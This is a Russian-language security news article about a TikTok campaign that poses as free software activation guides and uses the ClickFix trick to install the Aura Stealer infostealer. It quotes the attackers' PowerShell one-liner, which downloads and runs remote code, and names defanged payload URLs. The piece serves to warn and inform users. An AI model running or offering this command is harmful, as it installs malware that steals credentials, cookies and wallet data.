Видео в TikTok продолжают распространять информацию о ClickFix-атаках

Киберпреступники используют видео в TikTok, замаскированные под бесплатные руководства по активации популярных программ, таких как Windows, Spotify и Netflix, для распространения вредоносного ПО, похищающего информацию.

Специалист ISC Ксавье Мертенс обратил внимание на продолжающуюся кампанию, которая во многом схожа с той, что была замечена Trend Micro в мае

В видеороликах TikTok, которые видел BleepingComputer, якобы содержатся инструкции по активации легальных продуктов, таких как Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro и Discord Nitro, а также вымышленных сервисов, таких как Netflix и Spotify Premium.

Вредоносные видео в TikTok, распространяющие дезинформацию

На видео показана атака ClickFix — метод социальной инженерии, который предполагает предоставление якобы законных «исправлений» или инструкций, с помощью которых злоумышленники обманом заставляют пользователей выполнять вредоносные команды PowerShell или другие скрипты, заражающие их компьютеры вредоносным ПО.

В каждом видео показана короткая однострочная команда и указано, что её нужно запустить от имени администратора в PowerShell:

iex (irm slmgr[.]win/photoshop)

Следует отметить, что название программы в URL-адресе отличается в зависимости от того, какую программу выдают за другую. Например, в поддельных видеороликах об активации Windows вместо URL-адреса, содержащего photoshop, используется windows.

В рамках этой кампании при выполнении команды PowerShell подключается к удалённому сайту slmgr[.]win, чтобы получить и выполнить другой сценарий PowerShell.

Этот скрипт загружает два исполняемых файла со страниц Cloudflare. Первый исполняемый файл загружается с https://file-epq[.]pages[.]dev/updater.exe [VirusTotal]. Этот исполняемый файл является разновидностью вредоносной программы Aura Stealer, предназначенной для кражи информации.

Aura Stealer собирает сохранённые учётные данные из браузеров, файлы cookie для аутентификации, данные криптовалютных кошельков и учётные данные из других приложений и передаёт их злоумышленникам, предоставляя им доступ к вашим учётным записям.

Мертенс говорит, что будет загружена дополнительная полезная нагрузка под названием source.exe [VirusTotal], которая используется для самостоятельной компиляции кода с помощью встроенного компилятора Visual C# в .NET (csc.exe). Затем этот код внедряется и запускается в памяти.

Назначение дополнительной полезной нагрузки остаётся неясным.

Пользователи, выполнившие эти действия, должны считать, что все их учётные данные скомпрометированы, и немедленно сбросить пароли на всех сайтах, которые они посещают.

За последний год атаки с использованием ClickFix стали очень популярными. Они используются для распространения различных вредоносных программ в рамках кампаний по вымогательству и краже криптовалюты.

Как правило, пользователям не следует копировать текст с веб-сайта и запускать его в диалоговом окне операционной системы, в том числе в адресной строке проводника, командной строке, подсказках PowerShell, терминале macOS и оболочках Linux.

Редактор: AndreyEx